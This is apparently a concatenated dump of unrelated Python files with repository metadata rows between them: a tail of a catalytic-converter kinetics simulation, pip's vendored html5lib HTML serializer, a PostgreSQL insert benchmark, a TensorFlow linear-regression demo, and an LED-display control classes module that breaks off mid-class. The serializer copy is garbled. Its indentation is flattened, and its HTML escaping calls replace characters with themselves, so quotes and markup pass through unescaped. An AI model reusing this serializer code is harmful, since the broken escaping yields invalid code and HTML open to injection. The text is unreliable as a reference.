       "mol_products": {"CO": x, "H2": (x + y/2 - z)},
       "rxn_orders": {"HC": 1, "H2O": 1}
       }
# Register the kinetic parameters for every reaction declared above.
sim.set_reaction_info("r1", r1)
sim.set_reaction_info("r4", r4)
sim.set_reaction_info("r5", r5)
sim.set_reaction_info("r8", r8)
sim.set_reaction_info("r2", r2)
sim.set_reaction_info("r11", r11)
sim.set_reaction_info("r6", r6)
sim.set_reaction_info("r7", r7)
sim.set_reaction_info("r14", r14)
sim.set_reaction_info("r15", r15)
sim.set_reaction_info("r3", r3)
sim.set_reaction_info("r12", r12)
sim.set_reaction_info("r10", r10)

# Build the model constraints and discretize in space/time.
sim.build_constraints()
sim.discretize_model(method=DiscretizationMethod.FiniteDifference,
                     tstep=90,elems=20,colpoints=2)

# Setup temperature information from data
sim.set_temperature_from_data("A0", "T0", temp_data, {"T_in": 0, "T_mid": 2.5, "T_out": 5})

# ICs in ppm
sim.set_const_IC_in_ppm("HC","A0","T0",HC_in)
sim.set_const_IC_in_ppm("CO","A0","T0",CO_in)
sim.set_const_IC_in_ppm("NO","A0","T0",NO_in)
sim.set_const_IC_in_ppm("N2O","A0","T0",N2O_in)
sim.set_const_IC_in_ppm("NH3","A0","T0",NH3_in)
sim.set_const_IC_in_ppm("H2","A0","T0",H2_in)
sim.set_const_IC_in_ppm("O2","A0","T0",O2_in)
sim.set_const_IC_in_ppm("H2O","A0","T0",H2O_in)
sim.set_const_IC_in_ppm("CO2","A0","T0",CO2_in)

# BCs in ppm
sim.set_const_BC_in_ppm("HC","A0","T0",HC_in, auto_init=True)
sim.set_const_BC_in_ppm("CO","A0","T0",CO_in, auto_init=True)
sim.set_const_BC_in_ppm("NO","A0","T0",NO_in, auto_init=True)
sim.set_const_BC_in_ppm("N2O","A0","T0",N2O_in, auto_init=True)
sim.set_const_BC_in_ppm("NH3","A0","T0",NH3_in, auto_init=True)
sim.set_const_BC_in_ppm("H2","A0","T0",H2_in, auto_init=True)
sim.set_const_BC_in_ppm("O2","A0","T0",O2_in, auto_init=True)
sim.set_const_BC_in_ppm("H2O","A0","T0",H2O_in, auto_init=True)
sim.set_const_BC_in_ppm("CO2","A0","T0",CO2_in, auto_init=True)

# Fix all reactions for simulation mode only
sim.fix_all_reactions()

# ========== Selecting weight factors
sim.auto_select_all_weight_factors()

# Exclude N2O and CO data from the objective over the full time window.
sim.ignore_weight_factor("N2O","A0","T0",time_window=(0,110))
sim.ignore_weight_factor("CO","A0","T0",time_window=(0,110))
#sim.ignore_weight_factor("NO","A0","T0",time_window=(0,110))
#sim.ignore_weight_factor("NH3","A0","T0",time_window=(0,110))

# Initialize with auto-scaling, restarting on solver warnings/errors, then
# solve the full problem.
sim.initialize_auto_scaling()
sim.initialize_simulator(console_out=False,
                         restart_on_warning=True,
                         restart_on_error=True,
                         use_old_times=True)

sim.finalize_auto_scaling()
sim.run_solver()

# Model-vs-data comparison plots at the 5 cm outlet.
name = HC_name+"_CO"
sim.plot_vs_data("CO", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_NO"
sim.plot_vs_data("NO", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_HC"
sim.plot_vs_data("HC", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_NH3"
sim.plot_vs_data("NH3", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_N2O"
sim.plot_vs_data("N2O", "A0", "T0", 5, display_live=False, file_name=name)

# Axial profiles at selected times around light-off.
sim.plot_at_times(["CO"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
                  display_live=False, file_name=HC_name+"_CO-profile-out")
sim.plot_at_times(["O2"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
                  display_live=False, file_name=HC_name+"_O2-profile-out")
sim.plot_at_times(["HC"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
                  display_live=False, file_name=HC_name+"_HC-profile-out")
sim.plot_at_times(["NO"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
                  display_live=False, file_name=HC_name+"_NO-profile-out")

# Time histories at inlet (0 cm) and outlet (5 cm).
sim.plot_at_locations(["O2"], ["A0"], ["T0"], [0, 5], display_live=False, file_name=HC_name+"_O2-out")
sim.plot_at_locations(["H2"], ["A0"], ["T0"], [0, 5], display_live=False, file_name=HC_name+"_H2-out")

# Tabulated results and the fitted kinetic parameters; save model state for
# restarts / downstream analysis.
sim.print_results_of_breakthrough(["HC","CO","NO","NH3","N2O","H2","O2","H2O"],
                                  "A0", "T0", file_name=HC_name+"_lightoff.txt", include_temp=True)
sim.print_results_of_integral_average(["CO","NO","HC"], "A0", "T0", file_name=HC_name+"_avgs-used-for-inhibition.txt")
sim.print_kinetic_parameter_info(file_name=HC_name+"_params.txt")
sim.save_model_state(file_name=HC_name+"_model.json")
"ladshawap@ornl.gov"
] | ladshawap@ornl.gov |
213764349b4e9124de51c7db642daabac88ec7af | 454976b8d4f22f236097909d5c97262da66cb596 | /cangdan-test/venv/Lib/site-packages/pip-19.0.3-py3.8.egg/pip/_vendor/html5lib/serializer.py | 8efdfa5c6e2e843753626f1281c9e38912dcce30 | [] | no_license | butaihuiwan/cangdan | 6143f521ce490f2ee0151a4bb60ca964e88cbaa0 | 28ccb35c0de98aa3753c7f3809979d0b00bddfe0 | refs/heads/master | 2023-02-05T20:34:50.023866 | 2020-12-22T15:50:10 | 2020-12-22T15:50:10 | 323,663,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,763 | py | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type
import re
from codecs import register_error, xmlcharrefreplace_errors
from .constants import voidElements, booleanAttributes, spaceCharacters
from .constants import rcdataElements, entities, xmlEntities
from . import treewalkers, _utils
from xml.sax.saxutils import escape
_quoteAttributeSpecChars = "".join(spaceCharacters) + "\"'=<>`"
_quoteAttributeSpec = re.compile("[" + _quoteAttributeSpecChars + "]")
_quoteAttributeLegacy = re.compile("[" + _quoteAttributeSpecChars +
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n"
"\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15"
"\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x2f\x60\xa0\u1680\u180e\u180f\u2000"
"\u2001\u2002\u2003\u2004\u2005\u2006\u2007"
"\u2008\u2009\u200a\u2028\u2029\u202f\u205f"
"\u3000]")
_encode_entity_map = {}
_is_ucs4 = len("\U0010FFFF") == 1
for k, v in list(entities.items()):
# skip multi-character entities
if ((_is_ucs4 and len(v) > 1) or
(not _is_ucs4 and len(v) > 2)):
continue
if v != "&":
if len(v) == 2:
v = _utils.surrogatePairToCodepoint(v)
else:
v = ord(v)
if v not in _encode_entity_map or k.islower():
# prefer < over < and similarly for &, >, etc.
_encode_entity_map[v] = k
def htmlentityreplace_errors(exc):
if isinstance(exc, (UnicodeEncodeError, UnicodeTranslateError)):
res = []
codepoints = []
skip = False
for i, c in enumerate(exc.object[exc.start:exc.end]):
if skip:
skip = False
continue
index = i + exc.start
if _utils.isSurrogatePair(exc.object[index:min([exc.end, index + 2])]):
codepoint = _utils.surrogatePairToCodepoint(exc.object[index:index + 2])
skip = True
else:
codepoint = ord(c)
codepoints.append(codepoint)
for cp in codepoints:
e = _encode_entity_map.get(cp)
if e:
res.append("&")
res.append(e)
if not e.endswith(";"):
res.append(";")
else:
res.append("&#x%s;" % (hex(cp)[2:]))
return ("".join(res), exc.end)
else:
return xmlcharrefreplace_errors(exc)
register_error("htmlentityreplace", htmlentityreplace_errors)
def serialize(input, tree="etree", encoding=None, **serializer_opts):
"""Serializes the input token stream using the specified treewalker
:arg input: the token stream to serialize
:arg tree: the treewalker to use
:arg encoding: the encoding to use
:arg serializer_opts: any options to pass to the
:py:class:`html5lib.serializer.HTMLSerializer` that gets created
:returns: the tree serialized as a string
Example:
>>> from html5lib.html5parser import parse
>>> from html5lib.serializer import serialize
>>> token_stream = parse('<html><body><p>Hi!</p></body></html>')
>>> serialize(token_stream, omit_optional_tags=False)
'<html><head></head><body><p>Hi!</p></body></html>'
"""
# XXX: Should we cache this?
walker = treewalkers.getTreeWalker(tree)
s = HTMLSerializer(**serializer_opts)
return s.render(walker(input), encoding)
class HTMLSerializer(object):
# attribute quoting options
quote_attr_values = "legacy" # be secure by default
quote_char = '"'
use_best_quote_char = True
# tag syntax options
omit_optional_tags = True
minimize_boolean_attributes = True
use_trailing_solidus = False
space_before_trailing_solidus = True
# escaping options
escape_lt_in_attrs = False
escape_rcdata = False
resolve_entities = True
# miscellaneous options
alphabetical_attributes = False
inject_meta_charset = True
strip_whitespace = False
sanitize = False
options = ("quote_attr_values", "quote_char", "use_best_quote_char",
"omit_optional_tags", "minimize_boolean_attributes",
"use_trailing_solidus", "space_before_trailing_solidus",
"escape_lt_in_attrs", "escape_rcdata", "resolve_entities",
"alphabetical_attributes", "inject_meta_charset",
"strip_whitespace", "sanitize")
def __init__(self, **kwargs):
"""Initialize HTMLSerializer
:arg inject_meta_charset: Whether or not to inject the meta charset.
Defaults to ``True``.
:arg quote_attr_values: Whether to quote attribute values that don't
require quoting per legacy browser behavior (``"legacy"``), when
required by the standard (``"spec"``), or always (``"always"``).
Defaults to ``"legacy"``.
:arg quote_char: Use given quote character for attribute quoting.
Defaults to ``"`` which will use double quotes unless attribute
value contains a double quote, in which user_case single quotes are
used.
:arg escape_lt_in_attrs: Whether or not to escape ``<`` in attribute
values.
Defaults to ``False``.
:arg escape_rcdata: Whether to escape characters that need to be
escaped within normal elements within rcdata elements such as
style.
Defaults to ``False``.
:arg resolve_entities: Whether to resolve named character entities that
appear in the source tree. The XML predefined entities < >
& " ' are unaffected by this setting.
Defaults to ``True``.
:arg strip_whitespace: Whether to remove semantically meaningless
whitespace. (This compresses all whitespace to a single space
except within ``pre``.)
Defaults to ``False``.
:arg minimize_boolean_attributes: Shortens boolean attributes to give
just the attribute value, for example::
<input disabled="disabled">
becomes::
<input disabled>
Defaults to ``True``.
:arg use_trailing_solidus: Includes a close-tag slash at the end of the
start tag of void elements (empty elements whose end tag is
forbidden). E.g. ``<hr/>``.
Defaults to ``False``.
:arg space_before_trailing_solidus: Places a space immediately before
the closing slash in a tag using a trailing solidus. E.g.
``<hr />``. Requires ``use_trailing_solidus=True``.
Defaults to ``True``.
:arg sanitize: Strip all unsafe or unknown constructs from output.
See :py:class:`html5lib.filters.sanitizer.Filter`.
Defaults to ``False``.
:arg omit_optional_tags: Omit start/end tags that are optional.
Defaults to ``True``.
:arg alphabetical_attributes: Reorder attributes to be in alphabetical order.
Defaults to ``False``.
"""
unexpected_args = frozenset(kwargs) - frozenset(self.options)
if len(unexpected_args) > 0:
raise TypeError("__init__() got an unexpected keyword argument '%s'" % next(iter(unexpected_args)))
if 'quote_char' in kwargs:
self.use_best_quote_char = False
for attr in self.options:
setattr(self, attr, kwargs.get(attr, getattr(self, attr)))
self.errors = []
self.strict = False
def encode(self, string):
assert(isinstance(string, text_type))
if self.encoding:
return string.encode(self.encoding, "htmlentityreplace")
else:
return string
def encodeStrict(self, string):
assert(isinstance(string, text_type))
if self.encoding:
return string.encode(self.encoding, "strict")
else:
return string
def serialize(self, treewalker, encoding=None):
# pylint:disable=too-many-nested-blocks
self.encoding = encoding
in_cdata = False
self.errors = []
if encoding and self.inject_meta_charset:
from .filters.inject_meta_charset import Filter
treewalker = Filter(treewalker, encoding)
# Alphabetical attributes is here under the assumption that none of
# the later filters add or change order of attributes; it needs to be
# before the sanitizer so escaped elements come out correctly
if self.alphabetical_attributes:
from .filters.alphabeticalattributes import Filter
treewalker = Filter(treewalker)
# WhitespaceFilter should be used before OptionalTagFilter
# for maximum efficiently of this latter filter
if self.strip_whitespace:
from .filters.whitespace import Filter
treewalker = Filter(treewalker)
if self.sanitize:
from .filters.sanitizer import Filter
treewalker = Filter(treewalker)
if self.omit_optional_tags:
from .filters.optionaltags import Filter
treewalker = Filter(treewalker)
for token in treewalker:
type = token["type"]
if type == "Doctype":
doctype = "<!DOCTYPE %s" % token["name"]
if token["publicId"]:
doctype += ' PUBLIC "%s"' % token["publicId"]
elif token["systemId"]:
doctype += " SYSTEM"
if token["systemId"]:
if token["systemId"].find('"') >= 0:
if token["systemId"].find("'") >= 0:
self.serializeError("System identifer contains both single and double quote characters")
quote_char = "'"
else:
quote_char = '"'
doctype += " %s%s%s" % (quote_char, token["systemId"], quote_char)
doctype += ">"
yield self.encodeStrict(doctype)
elif type in ("Characters", "SpaceCharacters"):
if type == "SpaceCharacters" or in_cdata:
if in_cdata and token["data"].find("</") >= 0:
self.serializeError("Unexpected </ in CDATA")
yield self.encode(token["data"])
else:
yield self.encode(escape(token["data"]))
elif type in ("StartTag", "EmptyTag"):
name = token["name"]
yield self.encodeStrict("<%s" % name)
if name in rcdataElements and not self.escape_rcdata:
in_cdata = True
elif in_cdata:
self.serializeError("Unexpected child element of a CDATA element")
for (_, attr_name), attr_value in token["data"].items():
# TODO: Add namespace support here
k = attr_name
v = attr_value
yield self.encodeStrict(' ')
yield self.encodeStrict(k)
if not self.minimize_boolean_attributes or \
(k not in booleanAttributes.get(name, tuple()) and
k not in booleanAttributes.get("", tuple())):
yield self.encodeStrict("=")
if self.quote_attr_values == "always" or len(v) == 0:
quote_attr = True
elif self.quote_attr_values == "spec":
quote_attr = _quoteAttributeSpec.search(v) is not None
elif self.quote_attr_values == "legacy":
quote_attr = _quoteAttributeLegacy.search(v) is not None
else:
raise ValueError("quote_attr_values must be one of: "
"'always', 'spec', or 'legacy'")
v = v.replace("&", "&")
if self.escape_lt_in_attrs:
v = v.replace("<", "<")
if quote_attr:
quote_char = self.quote_char
if self.use_best_quote_char:
if "'" in v and '"' not in v:
quote_char = '"'
elif '"' in v and "'" not in v:
quote_char = "'"
if quote_char == "'":
v = v.replace("'", "'")
else:
v = v.replace('"', """)
yield self.encodeStrict(quote_char)
yield self.encode(v)
yield self.encodeStrict(quote_char)
else:
yield self.encode(v)
if name in voidElements and self.use_trailing_solidus:
if self.space_before_trailing_solidus:
yield self.encodeStrict(" /")
else:
yield self.encodeStrict("/")
yield self.encode(">")
elif type == "EndTag":
name = token["name"]
if name in rcdataElements:
in_cdata = False
elif in_cdata:
self.serializeError("Unexpected child element of a CDATA element")
yield self.encodeStrict("</%s>" % name)
elif type == "Comment":
data = token["data"]
if data.find("--") >= 0:
self.serializeError("Comment contains --")
yield self.encodeStrict("<!--%s-->" % token["data"])
elif type == "Entity":
name = token["name"]
key = name + ";"
if key not in entities:
self.serializeError("Entity %s not recognized" % name)
if self.resolve_entities and key not in xmlEntities:
data = entities[key]
else:
data = "&%s;" % name
yield self.encodeStrict(data)
else:
self.serializeError(token["data"])
def render(self, treewalker, encoding=None):
    """Serialize the stream from *treewalker* into a single string.

    :arg treewalker: the treewalker to serialize
    :arg encoding: optional byte encoding; when given, the result is bytes
    :returns: the serialized tree as ``str``, or ``bytes`` when *encoding*
        is supplied
    """
    if encoding:
        chunks = self.serialize(treewalker, encoding)
        return b"".join(chunks)
    chunks = self.serialize(treewalker)
    return "".join(chunks)
def serializeError(self, data="XXX ERROR MESSAGE NEEDED"):
    """Record the error message *data*; in strict mode, abort serialization.

    XXX: the intent is to eventually make *data* mandatory.
    """
    self.errors.append(data)
    if not self.strict:
        return
    raise SerializeError
class SerializeError(Exception):
    """Error raised when the token stream cannot be serialized."""
    # Note: the redundant `pass` was removed; the docstring alone is a
    # sufficient class body.
| [
"tangpeng@qq.com"
] | tangpeng@qq.com |
65c34ae7d029b3c2d46eebd148a9498d70551092 | 3e1b24261b1960315379d3cfabd19dedb2516510 | /Investigations/N-Grams/test_write.py | 83609f45bb0e8d21f2847e7d47fa58545d168201 | [] | no_license | Sentimentron/Utah | 56dbe308113f321df0ded8464cb1bfc7b09da281 | 305ddfa8a3b7a188c3aa0b9ca814fc0e4298cbbc | refs/heads/master | 2021-01-10T15:37:15.083264 | 2016-03-12T18:04:44 | 2016-03-12T18:05:11 | 53,739,381 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,541 | py | #!/bin/env python
import pickle
import postgresql
import logging
import time
import numpy
import random
if __name__ == "__main__":
db = postgresql.open("pq://worker:worker@localhost/keywords")
logging.info("Dropping database tables...")
db.query("drop owned by current_user");
logging.info("Opening dump file")
with open("words.pkl", "rb") as f:
words = pickle.load(f)
logging.info("Creating database tables...")
db.query(r"""CREATE TABLE keywords (id SERIAL, word TEXT UNIQUE NOT NULL)""")
logging.info("Picking some random words...")
# Pick about 10000 words for a sample read test
sample = list(words)
random.shuffle(sample)
sample = sample[:10000]
logging.info("Starting insertions")
stmt = db.prepare(r"""INSERT INTO keywords (word) VALUES ($1) ON CONFLICT DO
NOTHING""")
check = db.prepare("SELECT id FROM keywords WHERE word = $1")
results = []
for i, word in enumerate(words):
start = time.clock()
stmt(word)
end = time.clock()
results.append(end-start)
if i % 10000 == 0:
print("Written %.2f of all words" % (i*100.0/len(words)),)
avg_writes = numpy.mean(results)
print("Average words/second: %.2f" % (1/avg_writes,))
results = []
start = time.clock()
for s in sample:
for row in check(s):
pass
end = time.clock()
print("Read test took %.4f seconds" % (end-start))
| [
"richard@sentimentron.co.uk"
] | richard@sentimentron.co.uk |
a6ad3ef6884b158ee379e6fd362ad8f836abefb8 | 934f5e69784ec6bf6ddb0a3c0a8b65e7b8eedcee | /test2.py | 39b54fc0c2b6e2aa4b25675853288102c26d5d92 | [] | no_license | liuxiaoxi99/Deep-Learning-Course | 7752a797bebfdb10c5d5b1e0f9a008c5d38ddeb1 | d8a5461eaec11c5c518d8a9abe162ea9d9258754 | refs/heads/master | 2021-02-17T17:34:49.430553 | 2020-05-03T13:26:19 | 2020-05-03T13:26:19 | 245,114,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
# Fix the RNG seed so the synthetic data set is reproducible.
np.random.seed(5)
# 500 evenly spaced sample points on [0, 100].
x_data = np.linspace(0, 100, 500)
# Ground truth: y = 3.1234*x + 2.98 plus Gaussian noise.
# BUG FIX: np.random.randn takes dimension sizes as separate integers, not a
# shape tuple, so randn(x_data.shape) raised TypeError; unpack the shape.
y_data = 3.1234 * x_data + 2.98 + np.random.randn(*x_data.shape) * 0.4
plt.scatter(x_data, y_data)
plt.plot(x_data, 3.1234 * x_data + 2.98, "r")
def model(x, w, b):
    """Linear model: predict w*x + b element-wise."""
    product = tf.multiply(x, w)
    return product + b
# Trainable model parameters, initialised away from the true values.
# BUG FIX: tf.Variable's second positional argument is `trainable`, not the
# dtype, so tf.float32 was silently interpreted as the trainable flag; pass
# it by keyword instead.
w = tf.Variable(1.0, dtype=tf.float32)
b = tf.Variable(0.0, dtype=tf.float32)
def loss(x, y, w, b):
    """Mean squared error between the model prediction and the targets y."""
    residual = model(x, w, b) - y
    return tf.reduce_mean(tf.square(residual))
# Number of passes over the training set.
training_epochs=10
# SGD step size.
learning_rate=0.0001
def grad(x, y, w, b):
    """Return d(loss)/dw and d(loss)/db for one sample via autodiff."""
    with tf.GradientTape() as tape:
        current_loss = loss(x, y, w, b)
    return tape.gradient(current_loss, [w, b])
# --- Per-sample SGD training loop ---
step = 0            # total number of parameter updates so far
loss_list = []      # per-sample loss history
display_step = 20   # print progress every N updates

for epoch in range(training_epochs):
    for xs, ys in zip(x_data, y_data):
        loss_ = loss(xs, ys, w, b)
        loss_list.append(loss_)
        # Gradients of the loss w.r.t. w and b for this sample.
        delta_w, delta_b = grad(xs, ys, w, b)
        change_w = delta_w * learning_rate
        change_b = delta_b * learning_rate
        # Gradient-descent step: p <- p - lr * dL/dp.
        w.assign_sub(change_w)
        b.assign_sub(change_b)
        step += 1
        if step % display_step == 0:
            print("Training Epoch:", '%d' % (epoch + 1), "Step:%d" % (step), "loss=%f" % (loss_))
    # Draw the fitted line after each epoch to visualise convergence.
    plt.plot(x_data, w.numpy() * x_data + b.numpy())

# BUG FIX: model is declared as model(x, w, b); the original call
# model(w, 5.79, b) swapped x and w (it only produced the same number
# because multiplication commutes). Pass arguments in the declared order.
print("预测x=5.79时,y的值:", model(5.79, w, b))
plt.show() | [
"noreply@github.com"
] | liuxiaoxi99.noreply@github.com |
baf12697e198e067d2e64cbb25a3e47e7ad787b0 | 5a15698f16cb66bf1477f067cec8eb9285fa4041 | /led_display/app_controls.py | c6c0fc956e40314941f8e676e70e7986944906e4 | [
"MIT"
] | permissive | sodium24/led-display | 1e12f0832feb2fb3b0dd09d9655b2915ac4577ba | a5260b9c262f4e0cf64286205e69ab6e5a516fb4 | refs/heads/master | 2023-06-18T22:09:07.543472 | 2021-07-03T06:15:14 | 2021-07-03T06:15:14 | 376,031,828 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,756 | py | ################################################################################
# app_controls.py
#-------------------------------------------------------------------------------
# Control elements an app may use to simplify interacting with the LED display
# directly.
#
# By Malcolm Stagg
#
# Copyright (c) 2021 SODIUM-24, LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
################################################################################
import weakref
from PIL import Image
from rgbmatrix import graphics
class Control(object):
    """
    Base class for all graphical controls.

    Holds the bookkeeping shared by every control (identifier, weak
    back-reference to the owning app, z-order, enabled flag) and defines
    the drawing/animation hooks that concrete controls override.
    """

    def __init__(self, control_id, app_base):
        """Create the control with an identifier and its owning app."""
        self.control_id = control_id
        # Weak reference so a control never keeps its app alive.
        self.app_base = weakref.ref(app_base)
        self.z_index = 0
        self.enabled = True

    def delete(self):
        """Detach this control from its owning app."""
        owner = self.app_base()
        owner._delete_control(self.control_id)

    def get_static(self):
        """Return True: the base control never changes between frames."""
        return True

    def on_frame(self):
        """Per-frame hook; the base control has nothing to animate."""
        return

    def draw(self, canvas):
        """Drawing hook; the base control renders nothing."""
        return

    static = property(get_static)
class TextControl(Control):
    """
    Control for displaying a single line of text, with optional horizontal
    scrolling when the rendered text is wider than the canvas.
    """
    def __init__(self, control_id, app_base):
        """
        Initialize the control with an ID and app reference
        """
        super(TextControl, self).__init__(control_id, app_base)
        self._font = ""
        self._font_obj = None
        self._text = ""
        self._width = 0             # rendered pixel width of the text
        self._scroll_mode = "none"  # "none" or "auto"
        self._color = [0, 0, 0]
        self._color_obj = graphics.Color(*self._color)
        self._x = 0
        self._y = 0
        self._align = "left"
        self._scrolling = False     # True while the text is being scrolled
        self._scroll_pos = 0        # current scroll offset in pixels
        self._scroll_dir = 0        # 0 = scroll forward, otherwise reverse

    def set_font(self, font_name):
        """
        Set a font by name for the text
        """
        if font_name != self._font:
            self._font = font_name
            self._font_obj = self.app_base().load_font(font_name)
            self._update()

    def get_font(self):
        """
        Retrieve a font by name for the text
        """
        return self._font

    def set_text(self, text):
        """
        Set displayed text
        """
        if text != self._text:
            self._text = text
            self._update()

    def get_text(self):
        """
        Retrieve displayed text
        """
        return self._text

    def set_x(self, x):
        """
        Set x coordinate for where to draw the text
        """
        self._x = x

    def get_x(self):
        """
        Retrieve x coordinate for where to draw the text
        """
        return self._x

    def set_y(self, y):
        """
        Set y coordinate for where to draw the text (bottom of character)
        """
        self._y = y

    def get_y(self):
        """
        Retrieve y coordinate for where to draw the text (bottom of character)
        """
        return self._y

    def set_scroll(self, scroll_mode):
        """
        Set scroll mode (auto, none) for whether the text should scroll if too long
        """
        self._scroll_mode = scroll_mode
        self._update_scroll()

    def get_scroll(self):
        """
        Retrieve scroll mode (auto, none) for whether the text should scroll if too long
        """
        return self._scroll_mode

    def set_align(self, align):
        """
        Set text alignment (left, center, right)
        """
        self._align = align

    def get_align(self):
        """
        Retrieve text alignment (left, center, right)
        """
        return self._align

    def set_color(self, color):
        """
        Set text color, as [r, g, b] from 0 to 255
        """
        self._color = color
        self._color_obj = graphics.Color(*self._color)

    def get_color(self):
        """
        Retrieve text color, as [r, g, b] from 0 to 255
        """
        return self._color

    def _update(self):
        """
        Recompute the rendered text width from the current font and text.
        """
        self._width = 0
        if self._font_obj is not None:
            for character in self._text:
                self._width += self._font_obj.CharacterWidth(ord(character))
        self._update_scroll()

    def _update_scroll(self):
        """
        Update whether the text will scroll based on current parameters
        """
        self._scrolling = (self._width > self.app_base().offscreen_canvas.width and self._scroll_mode == "auto")

    def get_static(self):
        """
        Returns whether the display contents is static (False while scrolling)
        """
        return not self._scrolling

    def on_frame(self):
        """
        Handles a new frame event: advance the scroll position one pixel and
        wrap around once the text has fully left the canvas.
        """
        if not self._scrolling:
            return
        canvas_width = self.app_base().offscreen_canvas.width
        if self._scroll_dir == 0:
            self._scroll_pos += 1
            if self._scroll_pos >= self._width:
                self._scroll_pos = -canvas_width
        else:
            # BUG FIX: this branch previously referenced a nonexistent
            # self.scrolling[index] structure (NameError on `index`); it now
            # mirrors the forward branch in the opposite direction.
            self._scroll_pos -= 1
            if self._scroll_pos <= -canvas_width:
                self._scroll_pos = self._width

    def draw(self, canvas):
        """
        Draw the control's graphical data on the canvas.
        """
        x = self._x
        if self._align == "right":
            x -= self._width
        elif self._align == "center":
            x -= self._width / 2
        x_offset = 0
        if self._scrolling:
            x = max(0, x)
            x_offset = -self._scroll_pos
        if self._font_obj is not None and self._color_obj is not None:
            graphics.DrawText(canvas, self._font_obj, x + x_offset, self._y, self._color_obj, self._text)

    font = property(get_font, set_font)
    text = property(get_text, set_text)
    scroll = property(get_scroll, set_scroll)
    color = property(get_color, set_color)
    x = property(get_x, set_x)
    y = property(get_y, set_y)
    align = property(get_align, set_align)
    static = property(get_static)
class ImageControl(Control):
    """Control that renders a bitmap image loaded from a file on disk."""

    def __init__(self, control_id, app_base):
        """Initialize the control with an ID and app reference."""
        super(ImageControl, self).__init__(control_id, app_base)
        self._path = ""
        self._pos_x = 0
        self._pos_y = 0
        self._img_w = 0
        self._img_h = 0
        self._bitmap = None  # PIL RGB image, loaded lazily by _update()

    def set_filename(self, filename):
        """Set the image file to display; reloads the bitmap on change."""
        if filename == self._path:
            return
        self._path = filename
        self._update()

    def get_filename(self):
        """Return the path of the displayed image file."""
        return self._path

    def set_x(self, x):
        """Set the left edge of the image."""
        self._pos_x = x

    def get_x(self):
        """Return the left edge of the image."""
        return self._pos_x

    def set_y(self, y):
        """Set the top edge of the image."""
        self._pos_y = y

    def get_y(self):
        """Return the top edge of the image."""
        return self._pos_y

    def set_width(self, width):
        """Set the target display width; reloads the bitmap on change."""
        if width == self._img_w:
            return
        self._img_w = width
        self._update()

    def get_width(self):
        """Return the target display width."""
        return self._img_w

    def set_height(self, height):
        """Set the target display height; reloads the bitmap on change."""
        if height == self._img_h:
            return
        self._img_h = height
        self._update()

    def get_height(self):
        """Return the target display height."""
        return self._img_h

    def _update(self):
        """(Re)load and scale the bitmap once path and size are all known."""
        if self._path == "" or self._img_w == 0 or self._img_h == 0:
            return
        image = Image.open(self._path)
        # Scale in place, preserving aspect ratio, to fit the target box.
        image.thumbnail((self._img_w, self._img_h), Image.BICUBIC)
        self._bitmap = image.convert('RGB')

    def draw(self, canvas):
        """Blit the bitmap, if loaded, at the configured position."""
        if self._bitmap is None:
            return
        canvas.SetImage(self._bitmap, offset_x=self._pos_x, offset_y=self._pos_y)

    filename = property(get_filename, set_filename)
    x = property(get_x, set_x)
    y = property(get_y, set_y)
    width = property(get_width, set_width)
    height = property(get_height, set_height)
class FillControl(Control):
    """Control that floods the entire canvas with one solid color."""

    def __init__(self, control_id, app_base):
        """Initialize the control with an ID and app reference."""
        super(FillControl, self).__init__(control_id, app_base)
        self._color = [0, 0, 0]

    def set_color(self, color):
        """Set the fill color as [r, g, b], each 0-255."""
        self._color = color

    def get_color(self):
        """Return the fill color as [r, g, b]."""
        return self._color

    def draw(self, canvas):
        """Fill the whole canvas with the configured color."""
        canvas.Fill(*self._color)

    color = property(get_color, set_color)
class RectControl(Control):
    """
    Control to draw a rectangle with optional fill and optional outline.
    """
    def __init__(self, control_id, app_base):
        """
        Initialize the control with an ID and app reference
        """
        super(RectControl, self).__init__(control_id, app_base)
        self._stroke_color = [0, 0, 0]
        self._stroke_color_obj = graphics.Color(*self._stroke_color)
        self._fill_color = [0, 0, 0]
        self._fill_color_obj = graphics.Color(*self._fill_color)
        self._has_stroke = False
        self._has_fill = False
        self._x = 0
        self._y = 0
        self._width = 0
        self._height = 0

    def set_stroke_color(self, color):
        """
        Set stroke color, as [r, g, b] from 0 to 255
        """
        self._stroke_color = color
        self._stroke_color_obj = graphics.Color(*self._stroke_color)

    def get_stroke_color(self):
        """
        Retrieve stroke color, as [r, g, b] from 0 to 255
        """
        return self._stroke_color

    def set_fill_color(self, color):
        """
        Set fill color, as [r, g, b] from 0 to 255
        """
        self._fill_color = color
        self._fill_color_obj = graphics.Color(*self._fill_color)

    def get_fill_color(self):
        """
        Retrieve fill color, as [r, g, b] from 0 to 255
        """
        return self._fill_color

